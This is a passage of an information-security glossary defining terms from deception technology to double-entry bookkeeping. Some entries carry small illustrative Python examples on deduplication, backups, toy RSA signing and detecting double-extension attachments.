[Marketing] term for advanced honeypot systems designed to lure, divert, contain and gather information (intelligence) on hackers inside corporate networks, all the while deceiving them into believing they are genuinely gathering reconnaissance, exploiting vulnerabilities and capturing flags.  A potentially valuable approach in some circumstances, but potentially costly and risky too (e.g. distracting, diverting and misleading cybersecurity resources while engendering a false sense of security).

Decision criteria

“Thresholds, targets, or patterns used to determine the need for action or further investigation, or to describe the level of confidence in a given result” (ISO/IEC 15939:2007).


The authorized removal or downgrading of classification level on information for which the current class is no longer appropriate (e.g. outdated, irrelevant or already disclosed), thereby increasing permitted access.  “A process whereby information is reduced to an unclassified state and an administrative decision is made to formally authorise its release into the public domain” (NZ information Security Manual).

  See also redaction.


Convert coded messages into their plaintext equivalents, if necessary using the correct section, page and entries in a code book.

Decipher

Reversal of the encryption process requiring the correct key to recover the original plaintext from the cyphertext (where possible).


Some early ransomware had cryptographic design flaws or coding bugs, allowing encrypted files to be decrypted using utilities released by antivirus companies without victims having to pay the ransom.  Most current ransomware is better designed and coded, making encrypted files useless without the necessary decryption key.


Reduction or elimination of redundant information.  “Method of reducing storage needs by eliminating redundant data, which is replaced with a pointer to the unique data copy.  Note: Deduplication is sometimes considered a form of compression” (ISO/IEC 27040).
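The pointer-to-unique-copy mechanism in the ISO/IEC 27040 definition, shown as an added example that is not part of the glossary: a content-addressed store splits each file into fixed-size chunks, keeps one copy of each distinct chunk under its SHA-256 digest, and records a file as a list of digests (the pointers). The chunk size, file names and file contents are constructed for illustration.

```python
import hashlib
from typing import Dict, List, Tuple

# Constructed: a tiny fixed chunk size so the sample data produces duplicates.
# Real products use larger, often variable-length, chunks.
CHUNK_SIZE = 8


class DedupStore:
    """Content-addressed store: each unique chunk is kept once,
    and a file is just an ordered list of pointers (digests) to chunks."""

    def __init__(self) -> None:
        self.chunks: Dict[str, bytes] = {}      # digest -> the single stored copy
        self.files: Dict[str, List[str]] = {}   # file name -> chunk digests in order

    def put(self, name: str, data: bytes) -> int:
        """Store a file; return how many chunk bytes were actually written."""
        new_bytes = 0
        pointers: List[str] = []
        for offset in range(0, len(data), CHUNK_SIZE):
            chunk = data[offset:offset + CHUNK_SIZE]
            digest = hashlib.sha256(chunk).hexdigest()
            if digest not in self.chunks:       # first sighting: store the copy
                self.chunks[digest] = chunk
                new_bytes += len(chunk)
            pointers.append(digest)             # duplicates only cost a pointer
        self.files[name] = pointers
        return new_bytes

    def get(self, name: str) -> bytes:
        """Reassemble a file by following its pointers."""
        return b"".join(self.chunks[d] for d in self.files[name])

    def stored_bytes(self) -> int:
        """Physical bytes held, i.e. the sum of unique chunks only."""
        return sum(len(c) for c in self.chunks.values())


def demo() -> Tuple[int, int]:
    """Return (logical bytes submitted, physical bytes stored) for two
    constructed files that share a repeated 32-byte header."""
    store = DedupStore()
    file_a = b"HEADER01" * 4 + b"payloadA"   # 40 bytes
    file_b = b"HEADER01" * 4 + b"payloadB"   # 40 bytes
    store.put("a.bin", file_a)
    store.put("b.bin", file_b)
    # Integrity check: both files must reassemble exactly.
    assert store.get("a.bin") == file_a and store.get("b.bin") == file_b
    return len(file_a) + len(file_b), store.stored_bytes()


if __name__ == "__main__":
    logical, physical = demo()
    print(f"submitted {logical} bytes, stored {physical} bytes")
```

Because every read follows a digest back to a single shared copy, the store's integrity rests entirely on the collision resistance of the hash: two different chunks with the same digest would be silently merged. That is why a cryptographic hash, not a checksum, is used as the pointer.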

Deep cover

Infiltrating a target organisation so effectively that the infiltrator becomes highly trusted and may gain privileged access to its innermost secrets, albeit increasing the risk of the agent being turned or going native.  See also mole and sleeper.

Deep fake

Advanced audio-visual techniques can ‘put words into the mouths’ of celebrities, politicians, activists and adversaries, making them appear to express something they did not.  Just as written materials can be edited or fabricated, small changes to genuine audio-visual content (such as deleting the word “not” or changing a frown into a smile) are relatively easy to make seamlessly, yet can dramatically affect the meaning or interpretation of, say, a political speech or public statement.  As the techniques advance through artificial intelligence, neural networks and deep learning, wholesale changes are becoming easier to make and harder to spot, potentially leading to de novo fabrication of lengthy video clips in fake settings with fake audiences.  There are serious implications for society through large-scale social engineering such as fake news, fraud, espionage, information warfare and cyberwar, threatening forensics, authority, accountability and trust.

Deep packet inspection

Third generation firewalls can examine the payloads (data content) of network packets, as well as the IP addresses and protocol information in the packet headers, in order to apply more granular security rules.  Their ability to access the content of network traffic raises privacy and confidentiality concerns: these are trusted devices.

Deep Web, Deepweb,
Deep net, Deepnet

Internet sites and services that are not readily accessible and searchable using conventional search engines such as Google.  Includes the Darknet, plus web pages and servers protected behind corporate firewalls.


Stating or implying something false that unduly harms the image and reputation of another person.  Note that a true i.e. factually accurate statement, by definition, is not defamatory though it may be distinctly uncomplimentary.  See also libel and slander.


Pre-set configuration.  Straight out of the box, newly-installed software and hardware typically has standardized and convenient but relatively weak security settings, for example passwords that are widely known in the hacker community, and pass-all settings.

Default deny,

Access control principle stating that information should only be released to authenticated individuals if they have a legitimate purpose or reason for using the information, and are authorized to do so.

Default permit,

Access control principle stating that information should normally be released or disclosed unless such access needs to be explicitly denied for some specific, legitimate reason.


An identified bug, flaw or other inherent issue with a system, process, person, organisation etc.


Control principle whereby multiple overlapping or complementary ‘layers’ of protection are applied, all of which would have to be breached, overcome, disabled or bypassed in order to impact or compromise the protected information assets.  This is a structured, systematic approach, more than simply increasing the number of controls.  “A layered combination of complementary countermeasures” (Official ISC2 Guide to the CISSP CBK, 2007, page 282).

Defensive security,
passive security,
reactive security

Security practices that deter, prevent, react or respond to attacks and other incidents, generally by minimizing vulnerabilities and/or impacts for instance using silent alarms, tell-tales or whistleblower’s hotlines coupled with highly efficient incident response practices to react quickly and decisively to the very earliest signs of trouble.  Cf. offensive security.


To commit or perpetrate fraud.


Secure erasure process that applies an extremely strong magnetic field to magnetic data storage media such as computer disks or tapes to destroy the stored data.  In addition to concerns over the equipment and operating procedures, the extremely high density of modern magnetic storage methods, high coercivity of the materials, and use of RAID and similar redundant storage/error correction techniques makes degaussing less reliable in practice than it may appear, although subsequent physical destruction of degaussed media increases assurance.  “Render data unreadable by applying a strong magnetic field to the media” (ISO/IEC 27040).


A device that degausses.  “An electrical device or permanent magnet assembly which generates a coercive magnetic force to destroy magnetic storage patterns in order to sanitise magnetic media.” (NZ information Security Manual).

Delegated authority,

Refers to someone passing some of their responsibility and power to a subordinate within specified parameters, for example giving them the ability to sign-off (authorize) expenses claims or procurement orders up to a certain dollar value.  Implies a level of trust in the subordinate, often supported by additional controls.  While the authorized person is personally accountable for any incidents arising from their actions and inactions, the more senior person generally shares some of the accountability since he/she made the decision to delegate.

disposition mechanism, erasure,
destruction of data storage media,
anonymisation of data

“Process by which PII is changed in an irreversible manner so that it is no longer present or recognizable and cannot be used or reconstructed after the process.  Notes: (1) As a rule, “secure deletion” is required. Secure deletion means that reconstruction of the data is either impossible or requires substantial effort (in human resources, means, time). For selecting the deletion methods, the need for protection of the data concerned is to be taken into account; (2) Equally, an alternative way to reach the goal of deletion is anonymisation. Further guidance on anonymisation (as a de-identification technique) can be found in ISO/IEC 20889:2018-11 (1st edition) — Privacy enhancing data de-identification terminology and classification of techniques; (3) the term ‘deletion’ covers all such synonyms: disposition mechanism, erasure, destruction, destruction of data storage media, anonymization of data.” (ISO/IEC 27555 draft).

Deletion class

“Combination of a standard deletion period and an abstract starting point for the period run.  Note: All clusters of PII which are subject to the same deletion period and the same abstract starting point are combined in a deletion class. As opposed to the (specific) deletion rule for a cluster of PII, the (abstract) deletion class relates only to the abstract starting point and not to a specific condition for the start of the period run (see also [clause] 8).” (ISO/IEC 27555 draft).

Deletion framework

“Policy documents and implementation mechanisms by means of which a PII controller ensures that its pools of personally identifiable information are deleted in accordance with the applicable legislation and/or regulation.” (ISO/IEC 27555 draft).

Deletion period

“Time period after which a specific cluster of PII should be deleted.  Note: As a generic term, the deletion period comprises all deletion periods. This includes the →standard deletion periods and the →regular deletion periods, which form special groups. However, the term also includes, for instance, the specific deletion periods for some clusters of PII or deletion periods in special cases. For details see Clause 7.” (ISO/IEC 27555 draft).

Deletion rule

“Combination of deletion period and specific condition for the starting point of the period run” (ISO/IEC 27555 draft).

Demand letter

See cease and desist letter.

De-militarized zone

See DMZ.

(Data Execution Prevention)

Operating system security feature intended to prevent pages in memory that happen to contain executable code from actually being executed unless they have been explicitly designated executable by resetting the NX (No eXecute) bit.  Helps prevent buffer overflow and similar attacks.


Measure of the extent to which a system, network, person, team, organisation etc. can be relied upon or trusted to perform as expected under all anticipated and ideally unanticipated circumstances.  Implies a level of assurance as to the suitability and effectiveness of its resilience, recoverability and contingency preparations, and clarity of the requirements.


Legal process requiring someone in court under oath to provide immediate verbal answers to verbal questions.  A form of discovery.  See also interrogatory.


Withdrawn and no longer recommended for use.  If significant flaws are discovered in cryptosystems, for instance, the corresponding standards, algorithms, protocols etc. are, at some point, removed from service and superseded – hopefully – by better ones.

Derived measure

“Measure that is defined as a function of two or more values of base measures” (ISO/IEC 15939:2007).

(Data Encryption Standard)

Standard specifying a cryptographic algorithm (DEA - Data Encryption Algorithm) for US government use in 1977, published in FIPS PUB 46.  Still used by legacy systems, albeit normally in the somewhat more secure form of triple-DES.  Vulnerable to brute-force attacks with a key length constrained by the standard to 56 bits rather than the maximum of 64, hence DES is deprecated.


(a) Distinctive physical expression, shape or other characteristics of a product that is typically associated with a particular brand or trademark.  (b) Systematic process of analysing requirements, then creating and documenting something to satisfy those requirements.  (c) A structured and documented architecture.


Physically and/or logically obliterate information such that it is no longer recoverable in usable form, even using forensic techniques.  In some circumstances, the process may further involve erasing any trace of its prior existence (e.g. deleting associated metadata).  “Sanitize using physical techniques that make recovery infeasible using state of the art laboratory techniques and results in the subsequent inability to use the media for storage of data.  Note: Disintegrate, incinerate, melt, pulverize, and shred are destruct forms of sanitization” (ISO/IEC 27040).  Note: “destroy” is the correct English verb form, whereas “destruct” is an Americanism derived from “destruction”.  See also purge.


The act of destroying.  “Result of actions taken to ensure that media cannot be reused as originally intended and that information is virtually impossible or prohibitively expensive to recover” (ISO/IEC 27040).


“Develop and implement appropriate activities to identify the occurrence of a cybersecurity event.  The Detect Function enables timely discovery of cybersecurity events.” (NIST Cybersecurity Framework).  A core function within NIST’s cybersecurity framework along with identify, protect, respond and recover.

Detective control

Form of security control intended to detect an incident in progress, log the details and/or raise an alert or alarm to trigger the appropriate response.  See also preventive and corrective control.


Form of preventive control such as warnings and penalties intended to deter (that is, reduce the threat) of compromise or attack.

Development environment

Computer environment comprising systems, networks, devices, data and supporting processes that are used by software developers for developing new application systems.  Cf. production or test environments.


An item of computing or networking equipment, a piece of ICT hardware or electronic technology, or more generally a machine or method with a specific purpose.  Many devices also qualify as things or small systems.

Device access control software

Program restricting the use of communications ports and/or equipment (e.g. USB flash memory sticks) on a system.  “Software that can be installed on a system to restrict access to communications ports on workstations. Device access control software can either block all access to a communications port or allow access using a whitelisting approach based on device types, manufacturer’s identification, or even unique device identifiers” (NZ information Security Manual).

(Development – Operations integration)

Software engineering approach that integrates application development, testing and ICT operations functions/teams and automates processes, primarily to cut cycle times for software updates from months to hours.  A practical extension of Agile development, a form of RAD, and other continuous development methods.  See also DevSecOps.

(Development – Security Operations integration)

Extension of DevOps to integrate software development, testing, software/infrastructure security and ICT operations teams.  Extensive process automation speeds things up, improves repeatability and is well suited to cloud computing (e.g. automatically provisioning virtual systems, installing and configuring applications, and validating the installations including the security aspects).


One of several species of memory-scraping Point-of-Sale system malware discovered in the wild in 2012.


One of several species of ransomware in the wild in 2019 that strongly encrypts victims’ data, coercing them into paying a ransom for the decryption keys.  Targets small organisations, demanding ransoms of about $1k.

(Department of Homeland Security)

Spooky US government agency responsible for intelligence and surveillance in support of defense, counter-terrorism, critical national infrastructure protection etc.  See also FBI and CIA.


Old-skool form of malware which silently calls a premium rate phone number on the victim’s modem, committing toll fraud.  See also war dialler.

Dictionary attack

Cryptanalytic attempt to guess or crack a password using words from the dictionary, in various combinations (e.g. forwards, backwards, with numbers prepended or appended, with punctuation).  A more sophisticated form of brute force attack.


An assurance and ethics scandal involving the deliberate programming of VW diesel cars to detect and respond to emissions testing in progress, cutting exhaust emissions to ace the test but increasing emissions under normal operating conditions.  A sign of things to come, perhaps, as everyday objects are smartened-up, becoming things capable of evading dumb checks and controls.

Differential backup

A backup of all the files created or changed since the last image backup.  In contrast to incremental backups, a system can be recovered simply by restoring the most recent image and differential backups.  However, differentials contain more data, hence they take longer to write and use more storage, than most incrementals.
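The two restore properties described above (a differential restore needs only the image plus the most recent differential, while differentials grow and hold more data than incrementals), worked through as an added example that is not part of the glossary. The change log, backup days and file names are constructed for illustration; the image is taken on day 0 and later backups run on the listed days.

```python
from typing import Dict, List, Set, Tuple

# Constructed change log: (file name, day it was modified) after the full image on day 0.
CHANGES: List[Tuple[str, int]] = [("a", 1), ("b", 2), ("a", 3), ("c", 5)]
IMAGE_DAY = 0
BACKUP_DAYS: List[int] = [2, 4, 6]


def files_changed_between(changes: List[Tuple[str, int]], after: int, upto: int) -> List[str]:
    """Files with at least one modification in the window (after, upto]."""
    return sorted({name for name, day in changes if after < day <= upto})


def differential_plan(changes: List[Tuple[str, int]], image_day: int,
                      backup_days: List[int]) -> Dict[int, List[str]]:
    """Each differential reaches back to the image, so its contents only grow."""
    return {day: files_changed_between(changes, image_day, day) for day in backup_days}


def incremental_plan(changes: List[Tuple[str, int]], image_day: int,
                     backup_days: List[int]) -> Dict[int, List[str]]:
    """Each incremental covers only the window since the previous backup of any kind."""
    plan: Dict[int, List[str]] = {}
    prev = image_day
    for day in backup_days:
        plan[day] = files_changed_between(changes, prev, day)
        prev = day
    return plan


def volume(plan: Dict[int, List[str]]) -> int:
    """Total file entries written across all backup sets (a proxy for storage used)."""
    return sum(len(files) for files in plan.values())


def restore_differential(plan: Dict[int, List[str]], backup_days: List[int]) -> Tuple[Set[str], int]:
    """Restore = image + the most recent differential only.
    Returns (files newer than the image that get restored, number of backup sets read)."""
    latest = backup_days[-1]
    return set(plan[latest]), 2            # image + one differential


def restore_incremental(plan: Dict[int, List[str]], backup_days: List[int]) -> Tuple[Set[str], int]:
    """Restore = image + every incremental in order; a missing or corrupt
    incremental in the chain breaks the restore from that point on."""
    restored: Set[str] = set()
    for day in backup_days:
        restored |= set(plan[day])
    return restored, 1 + len(backup_days)   # image + all incrementals


if __name__ == "__main__":
    diff = differential_plan(CHANGES, IMAGE_DAY, BACKUP_DAYS)
    inc = incremental_plan(CHANGES, IMAGE_DAY, BACKUP_DAYS)
    print("differential sets:", diff, "entries written:", volume(diff))
    print("incremental sets: ", inc, "entries written:", volume(inc))
    print("differential restore reads", restore_differential(diff, BACKUP_DAYS)[1], "sets")
    print("incremental restore reads ", restore_incremental(inc, BACKUP_DAYS)[1], "sets")
```

With the constructed log, the differentials hold 2, 2 and 3 entries (7 written in total) against 2, 1 and 1 for the incrementals (4 in total), yet the differential restore reads two sets where the incremental restore reads four and depends on every link in the chain being intact.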

Diffie-Hellman groups

“A method used for specifying the modulus size used in the hashed message authentication code algorithms. Each DH group represents a specific modulus size.  For example, group 2 represents a modulus size of 1024 bits” (NZ information Security Manual).


See hash.

Digital certificate

File containing information about a user or system along with their public key plus a digital signature from the Certification Authority to authenticate the certificate itself and to some extent (according to the nature and extent of the checks performed) the user or system to whom it was issued.

Digital device

“Electronic equipment used to process or store digital data” (ISO/IEC 27037).

Digital evidence

Forensic evidence in the form of data (e.g. the contents of a hard drive, tablet, smartphone or USB memory stick) gathered in connection with investigating, proving or disproving a crime.  “Information or data, stored or transmitted in binary form, that may be relied on as evidence” (ISO/IEC 27037).

Digital evidence copy

In order to guarantee the integrity of digital evidence, forensic analysis is performed on evidential copies that have been produced by appropriate methods and can be verified correct.  “Copy of the digital evidence that has been produced to maintain the reliability of the evidence by including both the digital evidence and verification means where the method of verifying it can be either embedded in or independent from the tools used in doing the verification” (ISO/IEC 27037).

Digital Evidence First Responder (DEFR)

“Individual who is authorized, trained and qualified to act first at an incident scene in performing digital evidence collection and acquisition with the responsibility for handling that evidence. Note: Authority, training and qualification are the expected requirements necessary to produce reliable digital evidence, but individual circumstances may result in an individual not adhering to all three requirements.  In this case, the local law, organisational policy and individual circumstances should be considered” (ISO/IEC 27037).

Digital Evidence Specialist

“Individual who can carry out the tasks of a DEFR and has specialized knowledge, skills and abilities to handle a wide range of technical issues.  Note: A DES may have additional niche skills, for example, network acquisition, RAM acquisition, Linux or Mainframe knowledge.” (ISO/IEC 27037).

Digital forensics,
cyber forensics,
computer forensics

The forensic analysis of digital evidence.  Strictly speaking, evidence may be obtained from various devices and things besides computers, while computing is usually - but not necessarily - digital.

Digital investigation

“Use of scientifically derived and proven methods towards the identification, collection, transportation, storage, analysis, interpretation, presentation, distribution, return, and/or destruction of digital evidence derived from digital sources, while obtaining proper authorizations for all activities, properly documenting all activities, interacting with the physical investigation, preserving digital evidence, and maintaining the chain of custody, for the purpose of facilitating or furthering the reconstruction of events found to be incidents requiring a digital investigation, whether of criminal nature or not” (ISO/IEC 27043).  Wow!  See also digital forensics.

Digital signature

Cryptographic hash of a message or file, constructed with the sender’s private key, used to ‘seal’ the message/file thus enabling any subsequent changes to be identified and so authenticate both the message and the sender (giving non-repudiation).
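The hash-then-sign construction in the definition, as an added example that is not part of the glossary: the signer hashes the message, transforms the hash with the private key, and a verifier reverses the transformation with the public key and compares it to a fresh hash of the message. The example uses a deliberately tiny textbook RSA key built from two known primes (2^61-1 and 2^31-1) and reduces the hash modulo n instead of applying a padding scheme, both constructed shortcuts to keep it self-contained; a real deployment uses a standard library signature scheme with properly sized keys.

```python
import hashlib
from math import gcd
from typing import Tuple

# Constructed toy key material: two well-known Mersenne primes, far too small
# for real use. Real RSA keys are 2048 bits or more and use padding (e.g. PSS).
P = 2305843009213693951   # 2^61 - 1
Q = 2147483647            # 2^31 - 1
E = 65537                 # common public exponent

PublicKey = Tuple[int, int]    # (n, e)
PrivateKey = Tuple[int, int]   # (n, d)


def make_keypair() -> Tuple[PublicKey, PrivateKey]:
    """Derive (public, private) from the fixed toy primes."""
    n = P * Q
    phi = (P - 1) * (Q - 1)
    assert gcd(E, phi) == 1, "public exponent must be invertible mod phi"
    d = pow(E, -1, phi)            # private exponent (Python 3.8+)
    return (n, E), (n, d)


def digest_int(message: bytes, n: int) -> int:
    """Hash-then-sign: the signature covers SHA-256(message), not the raw message.
    Reducing mod n is a toy shortcut standing in for a proper padding scheme."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def sign(message: bytes, private_key: PrivateKey) -> int:
    """Seal the message: only the private-key holder can produce this value."""
    n, d = private_key
    return pow(digest_int(message, n), d, n)


def verify(message: bytes, signature: int, public_key: PublicKey) -> bool:
    """Recover the signed hash with the public key and compare with a fresh hash.
    Any change to the message or the signature makes the comparison fail."""
    n, e = public_key
    return pow(signature, e, n) == digest_int(message, n)


def demo() -> Tuple[bool, bool, bool]:
    """Return (genuine verifies, altered message rejected, altered signature rejected)."""
    public, private = make_keypair()
    message = b"Pay 100 to Alice"            # constructed sample message
    signature = sign(message, private)
    genuine_ok = verify(message, signature, public)
    altered_msg_ok = verify(b"Pay 900 to Alice", signature, public)
    altered_sig_ok = verify(message, (signature + 1) % public[0], public)
    return genuine_ok, altered_msg_ok, altered_sig_ok


if __name__ == "__main__":
    print(demo())   # expected (True, False, False)
```

The non-repudiation property in the definition follows from the key split: verification needs only the public key, so anyone can check the seal, while producing it requires the private key that only the sender holds. Because the signature is bound to the hash, changing a single byte of the message changes the hash and the check fails.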

Digital storage medium

“Device on which digital data may be recorded” (ISO/IEC 27037, adapted from ISO/IEC 10027).

[Data] Diode

“A device that allows data to flow in only one direction” (NZ information Security Manual).


Momentary/transient reduction in supply voltage, lasting a few micro- or milliseconds.  Most dips pass without incident, but electronic systems with insufficient voltage regulation may fail.  See also brownout, spike, surge and blackout.

Direct evidence

Forensic evidence that derives from or is closely related to an incident.  Cf. circumstantial evidence.


A terrible incident such as a major fire, flood, fraud or hack.  Distinguished from ordinary events, incidents or crises by its severity, scale and impact.

[IT] Disaster Recovery

Fallback arrangements to restore IT systems, data and services supporting critical business functions from backups, often at an alternative location using cloud-based or mobile IT facilities, following a major incident affecting the primary ICT production facilities.

Disaster Recovery Plan (DRP)

Documentation of an organisation’s DR arrangements.


Attempt to share risk by explicitly and expressly denying responsibility for something.  Often used in an attempt to limit legal liabilities.  See also notification.


Revelation of confidential information.  May be deliberate or accidental, forced (e.g. by coercion, blackmail or social engineering) or voluntary, whether authorized and permitted or unauthorized and forbidden.  See also discovery.


Forensics term for the enforced disclosure of evidence to the counterparty in an official investigation or court case.  A strong reason to limit the collection and storage of information whose very existence might prove embarrassing or damaging to the organisation or individuals concerned (e.g. risk assessment results or audit recommendations that were not taken seriously).  “Process by which each party obtains information held by another party or non-party concerning a matter.  Note: Discovery is applicable more broadly than to parties in adversarial disputes. Discovery is also the disclosure of hardcopy documents, Electronically Stored Information and tangible objects by an adverse party.  In some jurisdictions the term disclosure is used interchangeably with discovery.” (ISO/IEC 27050-1).  See also disclosure, deposition, interrogatory and subpoena.


Optional i.e. provided, used or configured according to someone’s discretion, choice or freewill.  Usually refers to IT security controls that are not mandatory.

Discretionary Access Control

Decisions on whether and how to control access to data can be made by the users of a DAC system using their discretion, as opposed to being coded irrevocably into a MAC system as an inherent part of its technical architecture.

Discussion forum, forum,
discussion group, group,
email reflector

Social networking discussion facility.  Messages sent to the group by a member through email or the website are automatically ‘reflected’ back to all members by email and (usually) archived on the website allowing them to be searched.  Messages containing sensitive or inappropriate content (e.g. intended for a specific group member or someone else entirely) or spam may be circulated in exactly the same way, while shared information may be exploited by social engineers.


Someone ‘ethically challenged’ who lies, deceives, cheats or defrauds others for their own benefit.  They cannot be relied upon, making them untrustworthy and probably unworthy of or unsuitable for various privileges and responsibilities.


Eliminate a malware infection from a system, normally by deleting the malicious software from wherever it is stored and (hopefully!) improving the security controls to prevent re-infection.  “To remove malware from within a file” (NIST SP800-114 rev1).


See misinformation.


Fall to pieces or rip asunder.  “Destruct by separating media into its component parts” (ISO/IEC 27040).

Disk image

(a) Copy of the data on a disk, typically created by an image backup.  (b) In computer forensics, a bit-copy of the entire contents of a disk or other storage medium using approved hardware, software and processes.  (c) In virtualisation, a virtual disk made available to a guest operating system by the hypervisor.

Disk mirroring,
(Redundant Array of
Inexpensive Devices)

Technique in which data are simultaneously written to and read from multiple disks, usually for resilience and/or performance reasons.  Various technical configurations are possible with different advantages, disadvantages, capabilities and information risks.


Eventual outcome or result of something.  “Range of processes associated with implementing records retention, destruction or transfer decisions which are documented in disposition authorities or other instruments” (ISO 30300:2011). 


Use of, or at least ready access to, alternative, independent services, sources, vendors, pieces of equipment, power sources, communications routes etc. in order to reduce the risk of failure of any one.  A resilience control.  Unanticipated dependencies between apparently diverse resources can create single points of failure and hence additional risks.  See also redundancy and mirror site.

Division of responsibilities, separation of duties,
segregation of duties

Control requiring the involvement of more than one individual or organisation to complete a business process e.g. a member of staff enters data but someone else, normally a supervisor or manager, must review and authorize it for processing.  Normally reinforced by controlled access to the corresponding system functions.  Reduces the possibility of fraud, barring collusion between the individuals or coercion, and data entry errors.  “Practice of dividing steps in a function among different individuals so as to keep a single individual from being able to subvert the process.” (PCI Card Production and Provisioning Physical Security Requirements, v2.0 January 2017).

(Data Leakage [or Loss] Prevention)

Security technology designed to monitor, identify, log/alert and if appropriate block the inappropriate transfer of confidential information through a network port or firewall, for example to prevent workers, malware or hackers disclosing or passing personal information, credit card numbers, trade secrets or other intellectual property to third parties through the Internet, whether by accident or on purpose.  Conceptually similar to IDS/IPS but concerns extrusion rather than intrusion.

(Digital Millennium
Copyright Act)

US law prohibiting technologies/devices that may be used to bypass or defeat software/hardware copy protection mechanisms.

(De-Militarized Zone),
screened subnet

Special network segment between external networks such as the Internet and internal corporate networks, within which proxy servers and firewalls are intended to identify and restrict unauthorized traffic while passing legitimate traffic.  Systems that need to connect to the Internet (such as Web servers, DNS servers, application servers or front-ends, and email servers) are typically located in the DMZ, and are hardened.  “Perimeter network (also known as a screened sub-net) inserted as a ‘neutral zone’ between networks” (ISO/IEC 27033-1).  “A small network with one or more servers that is kept separate from an agency’s core network, either on the outside of the agency’s firewall, or as a separate network protected by the agency’s firewall. Demilitarised zones usually provide public domain information to less trusted networks, such as the Internet” (NZ information Security Manual).

  See also zone.

(Domain Name System)

Network protocols and systems let us refer to Internet nodes by memorable domain names (such as rather than their numeric IP addresses (such as


Species of RAT malware in the wild in 2019.  Uses DNS tunnelling to communicate with the attacker’s C&C systems.

DNS [cache] poisoning

Attack that subverts DNS systems or records to direct victims covertly to a malicious domain, phishing or infectious website etc. instead of the benign one they anticipated e.g. by ‘poisoning’ cached DNS data with false linkages or by exploiting the ‘zone transfer’ process used to pass data between DNS servers.  See also pharming.


Implies that something (such as a policy, process or plan) is sufficiently stable and understood that it can be written down (‘captured’), and if appropriate then reviewed and approved by other stakeholders.  To have any value and avoid becoming shelfware, documents must be accessed, read and implemented or used, which is where awareness, training, compliance, reinforcement and/or enforcement activities come into play, along with quality factors such as the reading level, clarity, interest etc.  Changes to important documentation also need to be managed to ensure it remains aligned with the subject, relevant, complete and accurate (an integrity control).

Documented information

See document.  “Information required to be controlled and maintained by an organisation and the medium on which it is contained.  Notes: documented information can be in any format and media and from any source; documented information can refer to the management system, including related processes, information created in order for the organisation to operate (documentation), [and/or] evidence of results achieved (records).” (ISO/IEC 27000).

Domain owner

“A domain owner is responsible for the secure configuration of the security domain throughout its life-cycle, including all connections to/from the domain” (NZ information Security Manual).

Domain slamming

An unethical and barely legal social engineering scam to trick the registered owners of domains into transferring their registrations to a different fee-charging registrar, believing they are merely renewing. 


Neologism derived from domus (Latin for home) and robotics or informatics, meaning home automation, IoT and smart homes in particular.


Copy protection hardware device used to ‘unlock’ (i.e. permit access to and use of) software on the particular computer into which it is physically plugged.  Also, a hardware authentication token.  Both forms normally use cryptography and tamper resistance to prevent the devices being illicitly duplicated or fabricated, but the corresponding applications may be vulnerable to hacking that bypasses or negates the protection.

Door open alarm

Physical security arrangement that monitors an access-controlled door, triggering an alarm if it is opened (e.g. opening an emergency fire exit may sound the fire alarm to evacuate the building) or held open much longer than it would take even the slowest person to pass through (e.g. a card access controlled office door propped open for some reason may sound an annoying local ‘peeper’ and/or a silent/remote alarm in the security guard house).  Electronic door open alarms may be manually overridden or silenced for authorized purposes such as office moves or refits, but such overrides should preferably trigger indicators (such as a flashing warning light), automated reminders or cancellation/time-outs to prevent them being forgotten and left in effect beyond the allotted time.


Windows malware in the wild from 2011 to 2016.  RAT spread via infectious websites (including Jamie Oliver’s), social networks, IM and USB devices, delivering various payloads including bank Trojans, keyloggers and DDoS engines.  The botnet’s command-and-control structure was disrupted by the authorities with assistance from technology companies in 2016.

(Denial of Service)

Type of information security incident in which availability is impacted, for example by deliberately or accidentally overloading the system or network, thereby interfering with legitimate business use.  “Prevention of authorized access to a system resource or the delaying of system operations and functions, with resultant loss of availability to authorized users” (ISO/IEC 27033-1).  See also DDoS and DRDoS.

Double agent

An agent who surreptitiously remains loyal to and acts in the interests of one party while giving the appearance of loyalty towards another.  A form of sabotage or cybertage.

Double extension

Operating systems and applications often determine a file’s type according to the final extension on its name, preceded by a period (e.g. files containing executable programs often end with .exe).  Systems may not display the extension for known file types.  Additional periods and characters preceding the final extension (such as .txt.exe) may be treated as part of the file name.  Some malware uses this and other social engineering techniques to fool victims, for instance an email might entreat the user to “open the attached text file containing a disputed invoice”, whereas the attachment is actually a malicious program that executes when the victim opens it.
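A mail-gateway check for the trick described above, as an added example that is not part of the glossary.  It reports what Windows Explorer would display (the last ‘known’ extension hidden) against what the operating system would actually execute, and also catches the related padding trick where spaces push the real extension out of view.  The extension lists and the sample attachment names are constructed and illustrative, not exhaustive.

```python
"""Spot deceptive double extensions in attachment names: added example, not from the glossary.

Windows Explorer hides the last extension of 'known' file types by default,
so 'invoice.txt.exe' is displayed as 'invoice.txt'.  The check reports what
the user sees against what the operating system will actually run.  The
extension lists and the sample names are illustrative, not exhaustive.
"""
from typing import Dict, List

EXECUTABLE = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse", "vbs",
              "vbe", "wsf", "hta", "msi", "ps1", "lnk"}
DOCUMENT = {"txt", "pdf", "doc", "docx", "xls", "xlsx", "jpg", "png", "zip",
            "htm", "html"}

SAMPLE_ATTACHMENTS = [                     # constructed sample
    "Disputed invoice.txt.exe",
    "report.pdf",
    "photo.jpg      .scr",                 # padding spaces hide the real extension
    "setup.exe",
    "archive.tar.gz",
    "README",
]


def classify(filename: str) -> Dict[str, object]:
    parts = [p.strip() for p in filename.strip().split(".")]  # strip padding around the dots
    real_ext = parts[-1].lower() if len(parts) > 1 else None
    apparent_ext = parts[-2].lower() if len(parts) > 2 else None
    hidden = real_ext in EXECUTABLE or real_ext in DOCUMENT   # Explorer hides 'known' extensions
    return {
        "displayed_as": ".".join(parts[:-1]) if hidden else filename.strip(),
        "executes_as": real_ext if real_ext in EXECUTABLE else None,
        # executable type masquerading behind a document-looking extension
        "deceptive": real_ext in EXECUTABLE and apparent_ext in DOCUMENT,
    }


def scan(filenames: List[str]) -> List[str]:
    """Return the attachment names that should be quarantined."""
    return [f for f in filenames if classify(f)["deceptive"]]


if __name__ == "__main__":
    for name in SAMPLE_ATTACHMENTS:
        print(f"{name!r:32} -> {classify(name)}")
```

Note that a plain `setup.exe` is not flagged: the check is for disguise, not for executables as such, which a gateway policy may block separately.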

Double-entry bookkeeping

Accountancy process used since Roman times in which every transaction is recorded as a complementary pair of credits and debits (equal in value but opposite in sign) in the relevant accounts.  Any discrepancy between the running totals of the paired accounts when they are reconciled generally indicates a simple data-entry or calculation error but could point to fraud or theft.


